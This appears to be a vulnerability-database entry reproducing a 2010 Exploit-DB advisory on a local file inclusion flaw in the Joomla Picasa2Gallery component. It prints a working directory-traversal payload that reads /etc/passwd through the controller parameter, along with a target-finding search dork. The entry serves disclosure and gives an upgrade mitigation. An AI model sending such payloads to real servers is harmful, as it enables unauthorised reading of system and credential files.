Joomla Component Picasa2Gallery LFI vulnerability

vendor:

Picasa2Gallery

by:

kaMtiEz

6,4

CVSS

MEDIUM

LFI

CWE

Product Name: Picasa2Gallery

Affected Version From: 1.2.8

Affected Version To: 1.2.8

Patch Exists: YES

Related CWE: N/A

CPE: a:masselink:picasa2gallery

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component Picasa2Gallery LFI vulnerability

A Local File Inclusion (LFI) vulnerability exists in Joomla Component Picasa2Gallery version 1.2.8 and lower. An attacker can exploit this vulnerability to read sensitive files on the server by sending a specially crafted HTTP request containing directory traversal characters. This vulnerability can be exploited by sending a malicious HTTP request to the vulnerable server, such as http://127.0.0.1/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00

Mitigation:

Upgrade to the latest version of Joomla Component Picasa2Gallery.

Source

Exploit-DB raw data:

[!]===========================================================================[!]

[~] Joomla Component Picasa2Gallery LFI vulnerability 
[~] Author	: kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage	: http://www.indonesiancoder.com
[~] Date	: 22 june, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://www.masselink.net
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://www.masselink.net/downloads/Software/Picasa2Gallery-1.2.8/
[+] Version : 1.2.8 or lower ;)

[!]===========================================================================[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_picasa2gallery&controller=[INDONESIANCODER]

[ XpL ]

../../../../../../../../../../../../../../../etc/passwd%00


[ d3m0 ]

http://sever/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM MainHack MAGELANG CYBER ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW IH-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,Jack-
[+] Contrex,YadoY666,bumble_be,MarahMeraH,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,vYcOd,ayy,otong,CS-31,yur4kh4,MISTERFRIBO,GENI212


[ NOTE ] 

[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM 
[+] Jika kami bersama Nyalakan Tanda Bahaya ;)
[+] Ayy : HappY birthday yak .. maap ketinggalan aha . . .
[+] MALANG ! kami datang ... ^^

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..